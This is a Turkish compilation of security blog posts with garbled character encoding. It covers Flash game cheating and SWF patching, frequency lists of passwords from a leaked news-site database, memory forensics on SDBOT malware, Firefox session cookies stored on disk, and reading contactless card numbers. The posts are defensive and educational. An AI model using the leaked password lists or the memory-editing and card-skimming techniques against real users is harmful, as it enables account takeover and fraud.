aynı kodlama imlasına (syntax) sahiptir Actionscriptin 2 suumlruumlmuuml Flash oynatıcı 8 ve oumlncesi suumlruumlmlerde 3 suumlruumlmuuml ise9 ve sonrası suumlruumlmlerde ccedilalışmaktadır

Aralık 2010 yılında Millward Brown tarafından gerccedilekleştirilen ankete goumlre Adobe Flash oynatıcısı internet erişimi olan bilgisayarların99unda yuumlkluumlymuumlş Anket bir yana zaten guumln iccedilinde gezdiğimiz sitelerin iccedileriğine biraz daha dikkat edecek olursak ccediloğunda Flashile geliştirilmiş bir kısım olduğunu goumlrebiliriz Web uygulama guumlvenliğinde ccediloğunlukla Flash uygulama guumlvenliği goumlz ardı edilmekteve art niyetli kişilerin hedefi haline gelebilmektedir

Oumlrnek olarak Flash ile geliştirilmiş oyunları ele alarak art niyetli kişilerin ccediloğunlukla yoğunlaştığı noktalara kısa goumlz atalım

bull Flash oynatıcı ile sunucu arasında gerccedilekleşen trafiğin manipuumlle edilmesi Oumlzellikle Flash ile geliştirilmiş olan oyunlarda istemcitarafına guumlvenilerek kontrollerin istemci tarafında gerccedilekleştirilmesi sağlanmakta ve istemci tarafında işlenen veri sorgusuz sualsizsunucu tarafında işleme alınmaktadır Durum boumlyle oluncada oumlduumllluuml oyunlarda ve yarışmalarda bu durumu istismar eden hilecilerortaya ccedilıkmakta ve haksız kazanccedil sağlamaktadırlar Oumlrnek olarak aşağıdaki ekran goumlruumlntuumlsuumlnde yer alan oyunu inceleyecekolursanız sunucudan istemci tarafına sorulara ilave olarak yanıtların da goumlnderildiğini goumlrebilirsiniz Bu trafiği goumlrebilmek vegerekirse manipuumlle edebilmek iccedilin yapmanız gereken Burp Paros ve benzer proxy araccedilları ile internet tarayıcısı ile sunucusuarasına girmektir

37

38

bull Kaynak koduna ccedilevirme Az oumlncede bahsettiğim gibi baytkod olmasından oumltuumlruuml Flash uygulamalarını kaynak koduna 3 parti biraraccedil ile ccedilevirmek oldukccedila kolaydır bu nedenle uygulama iccediline statik kullanıcı adı ve şifre koymak doğru bir yaklaşım olmaz Aşağıdaki ekran goumlruumlntuumlsuuml bu hatayı goumlzler oumlnuumlne seren guumlzel bir oumlrnek olabilir

39

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 6: Hack 4 Career - 2011

6

DLLLIST komutu ile zararlı yazılım tarafından yuumlklenen DLL dosyalarını listelediğimde ise urlmondll ve cryptdlldll dosyaları şuumlpheliduruyordu

7

CONNSCAN komutu ile sistem uumlzerindeki aktif ağ bağlantılarını listelediğimde ise 2888 PIDsi ile ccedilok sayıda bağlantı kurulduğunugoumlrduumlm

PROCEXEDUMP komutu ile indekexe yazılımına ait olan belleği diske kaydettikten sonra strings ve IDA PRO programları ileincelediğimde ise bu zararlı yazılımın SDBOTın bir varyantı olduğunu kolayca anladım

8

9

Son olarak zararlı yazılım uumlzerinde yer alan zaman damgasına baktığımda ise SDBOT varyantının hemen hemen herguumln guumlncellenipderlendiği sonucu ortaya ccedilıkıyordu

Goumlruumllduumlğuuml uumlzere bellek analizi ile zararlı yazılımlar dinamik analiz kadar olmasa da rahatlıkla analiz edilebilir ve yeterli bir eldeedilebilinir Oumlzellikle bu yazıda değinmediğim diğer Volatility komutlarına (malfind gdt apihooks idt vb) goumlz atacak olursanız bellekanalizi ile rootkit yazılımlarını dahi tespit etmeniz muumlmkuumln olabilir

Bir sonraki yazıda goumlruumlşmek dileğiyle yeni yılın herkese sağlık mutluluk ve bol kazanccedil getirmesini dilerim

Firefox Oturum Geri Yuumlkleme OumlzelliğiSource httpswwwmertsaricacomfirefox-oturum-geri-yukleme-ozelligi

10

By MS on December 12th 2011

Accuvant firmasının yaptığı araştırmaya goumlre Chrome internet tarayıcısının rakiplerinden daha guumlvenli olduğu ortaya ccedilıkmış Araştırmasonucunda ortaya ccedilıkan sıralamada Firefox internet tarayıcısının uumlccediluumlncuuml sırada yer alması kimilerini şaşırtsa da beni pek şaşırtmadı

Geccediltiğimiz guumlnlerde bir web uygulaması uumlzerinde penetrasyon testi gerccedilekleştirirken işlem (transaction) bazlı jeton (token)kullanılmaması durumunda oturum ccedilerezini (session cookie) ccedilalan art niyetli bir kişinin kurbanın oturumunu ccedilaldıktan (session hijack)sonra uygulama uumlzerinde hangi işlemleri rahatlıkla gerccedilekleştirebileceğini duumlşuumlnuumlyordum Daha sonra oturum ccedilerezinde HTTPOnlybayrağının kullanılıyor olması nedeniyle bu riskin gerccedilekleşme ihtimalini duumlşuumlnmeye başladım Ardından işletim sistemine bulaşanzararlı bir yazılımın oturum ccedilerezini ccedilalmak iccedilin izleyeceği yolları duumlşuumlnmeye başladım Oturum ccedilerezi hafızadan (RAM) ne kadarrahatlıkla ccedilalınabilirdi Meşhur bankacılık truva atları (zeus spyeye) gibi internet tarayıcıları ile ilişkili dosyalara kanca (hook) atarakmı ccedilalmak daha kolay olurdu diye duumlşuumlnuumlrken dosya sistemi uumlzerinde tutulan normal ccedilerezlerden farklı olan oturum ccedilerezlerinin dosyasistemi uumlzerinde tutuluyor olma ihtimaline nedense pek ihtimal vermiyordum ancak yine de goumlz atmaya karar verdim

Oumlncelikle sanal makine uumlzerine Chrome (150874121) Firefox (801) ve Internet Explorer (90) internet tarayıcılarının en sonsuumlruumlmlerine kurdum ve uumlccedil internet tarayıcısı ile oturum ccedilerezi ile birlikte guumlvenlik bayrağı (secure flag) ve HTTPOnly bayrağı kullanılanbir web sitesini ziyaret ettim Ardından web sitesi tarafından her bir internet tarayıcısına goumlnderilen oturum ccedilerezini not ederekinternet tarayıcıları tarafından kullanılan klasoumlrlerde bu ccedilerezleri arattığımda sadece Firefox internet tarayıcısının oturum ccedilerezini dosyasisteminde kayıt altına aldığını goumlrduumlm

11

Sessionstorejs dosyasında yer alan objeler JavaScript Object Notation (JSON) formatında saklandığı iccedilin kolay okunabilmesi adınajsbeautifierorg sitesinde iccedileriği duumlzenlettiğimde oturum ccedilerezi okunabilir hale geldi

12

Peki ne Chrome ne Internet Explorer internet tarayıcısı oturum ccedilerezini dosya sistemi uumlzerinde okunaklı olarak saklamazken Firefoxsaklıyordu ve saklamasının son kullanıcıya ne tuumlr bir etkisi olabilirdi

Web siteleri sizi her oturumda size oumlzel uumlretilen oturum ccedilerezleri uumlzerinden takip eder doğrular ve işleminizi gerccedilekleştirir Oumlrnekolarak bir internet bankacılığı uygulaması duumlşuumlnelim Uygulamaya giriş yaptıktan sonra uygulama size o oturuma oumlzel bir oturumccedilerezi goumlndererek sizin doğrulama adımlarından başarıyla geccediltiğinizi kabul eder ve gerccedilekleştireceğiniz her işlemde (işlem bazlı jetonkullanılmadığı durumlarda) oturum ccedilerezinizi kontrol ederek işleminizi gerccedilekleştirir

Peki ya bu oturum ccedilereziniz ccedilalınırsa ne olur Art niyetli kişi sizin adınıza gerccedilekleştirmeye yetkili olduğunuz tuumlm işlemleri (paratransferleri doumlviz alışsatış vs) gerccedilekleştirebilir İşte bu nedenle oturum ccedilerezlerinin dosya sistemine kayıt edilmesi ve zararlı yazılımlartarafından kolaylıkla ccedilalınabilir olması tercih edilmez

Peki Firefox internet tarayıcısı bunu neden yapıyor Beklenmeyen bir durumda (crash) yeni bir eklenti yuumlklendikten sonra veya otomatikguumlncelleştirme sonrasında internet tarayıcısının yeniden başlatılması gibi ihtiyaccedillar ortaya ccedilıktığı iccedilin oturumların kaldığı yerden devamedebilmesi (session restore) amacıyla oturum ccedilerezlerini Sessionstorejs dosyasında saklamaktadır

Her ne kadar sisteme bulaşmış zararlı bir yazılım guumlnuumln sonunda hangi internet tarayıcısı olursa olsun bellekten okuma kancaatma ve diğer youmlntemler ile oturum ccedilerezlerini ccedilalabilse de kullandığınız internet tarayıcınızın art niyetli kişilerin işlerini bu kadarkolaylaştırmıyor olması gerekmektedir

Guumlvenliğiniz iccedilin oturum geri yuumlkleme (session restore) oumlzelliğini devre dışı bırakmanızı oumlneririm Bunun iccedilin aşağıdaki iki değeri 0olarak değiştirmeniz yeterli olacaktır

13

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerimhellip

Temassız TehlikeSource httpswwwmertsaricacomtemassiz-tehlikeBy MS on November 25th 2011

Son guumlnlerde sahip olduğum kredi kartlarına baktığımda hemen hemen hepsinin temassız kredi kartı (Mastercard ise Paypass yazısı Visaise PayWave amblemi) olduğunu farkettim 2008 yılında temassız kredi kartlarının sayısı bir elin parmaklarını geccedilmezken guumlnuumlmuumlzdeartık ccediloğu banka muumlşterilerinin kredi kartlarını temassız kredi kartları ile yeniler oldu Oumlzellikle NFC (Near Field Communication)teknolojisinin cep telefonları ve akıllı telefonlarda yer alması ve yakın zamanda temassız alışverişe imkan sağlayacak olmaları nedeniyle

14

kimi haber sitelerinde yer alan haberlere goumlre yakın zamanda temaslı ve temassız kredi kartları tarih olarak yerlerini bu cihazlara bırakıyorolacaklar

Her ne kadar bu ve benzer haberlerin oumlnuumlmuumlzdeki 5 yıl iccedilerisinde gerccedilekleşme olasılığı bana goumlre duumlşuumlk olsa da bir guumlvenlik uzmanıolarak cuumlzdanımda RFID teknolojisini kullanan temassız kredi kartı taşımak yerine NFC teknolojisini kullanmayı tercih ederim Bununen buumlyuumlk nedeni cuumlzdanınızda bulunan temassız kredi kartı haberiniz olmadan herhangi bir RFID okuyucu ile okunabilirken NFCteknolojisi kullanan bir cihazda bu olasılığın oldukccedila duumlşuumlk olmasıdır nedeni ise bunun iccedilin oumlncelikle kredi kartı yerine kullanacağınızmobil uygulamayı ccedilalıştırmış ve NFC vericisini devreye sokmuş olmanız gerekmektedir

Peki benim gibi cuumlzdanında temassız kredi kartı taşıyanlar iccedilin durum ne kadar vahim veya gerccedilekten vahim mi Gelin bu soruyabirlikte yanıt arayalım

Eğer yıl 2008 olsaydı ve cuumlzdanınızda temassız kredi kartı taşıyor olsaydınız meraklı bir kişi RFIDIOt adındaki yazılım ve desteklediğiRFID okuyucu ile temassız kredi kartınızın iccedilinde yer alan etiketi okuyarak adınızı soyadınızı kredi kartı numaranızı ve kredi kartınızınson kullanma tarihini kolaylıkla oumlğrenebilirdi Nasıl mı İşte boumlyle

Guumlnuumlmuumlze gelecek olursak aynı durumun halen geccedilerli olup olmadığının yanıtını geccediltiğimiz guumlnlerde aramaya koyuldum ve testebaşlayabilmek iccedilin ilk olarak ihtiyaccedil duyacağım malzemeleri toplamaya başladım Temassız kredi kartı olarak geccediltiğimiz aylarda elimeulaşan Mastercardın temassız kredi kartını RFID okuyucu olarak OmniKey CardMan 5321 cihazını okuyucu yazılımı olarak iseRFIDIOt v10b yazılımını işletim sistemi olarak uumlzerinde Python v271 pyreadline ve pyscard moduumlllerinin kurulu olduğu Windows7 işletim sistemini kullandım

Teste başladığım zaman RFIDIOt yazılımının temassız kredi kartında yer alan etiketi okuduktan sonra Unrecognized TAG(tanımlanamayan etiket) hatasını doumlnduumlğuumlnuuml goumlrduumlm Hata ile birlikte doumlnen paketleri incelediğimde bu paketler iccedilerisinde kredikartı numaramın ve son kullanma tarihinin HEX değerlerinin yer aldığını goumlrduumlm Yaklaşık 15 sene oumlnce guumlncellenen RFIDIOtyazılımında yer alan tanımlı APDU komutlarının ve ccediloumlzuumlmleme (parse) fonksiyonlarının eski kaldığını duumlşuumlnerek alternatif yazılımlararamaya koyuldum ve Brad Antoniewiczin blogunda yer alan ChasePayPassBlink yazılımı ile karşılaştım Ancak bu yazılımın Chasebankamatikkredi kartına youmlnelik geliştirildiğini oumlğrendikten sonra elimde bulunan Mastercardın Paypass kredi kartı iccedilin bu yazılımuumlzerinde değişiklikler yapmam gerekeceğini anladım ve kısa bir araştırma ve ccedilalışmanın sonucunda ortaya Paypass Kredi Kartı Okuyucuyazılımı ccedilıkmış oldu Yazılımı ccedilalıştırır ccedilalıştırmaz temassız kredi kartından kredi kartı numarasını ve son kullanma tarihini başarıylaokuyabildiğini goumlrduumlkten sonra testi tamamladım

2008 yılından farklı olarak temassız kredi kartında yer alan etikette artık muumlşteri adı ve soyadının yer almamasını sevinccedille karşılamışolmama rağmen kredi kartı numarasının ve son kullanma tarihinin halen okunabiliyor olması her ne kadar direkt olarak dolandırıcılartarafından alehyte kullanılamayacak olsa da sosyal muumlhendislik youmlntemleri ile diğer bilgiler ile birleştirilerek kullanılma ihtimalikonusunda duumlşuumlnduumlrtmeye yetti

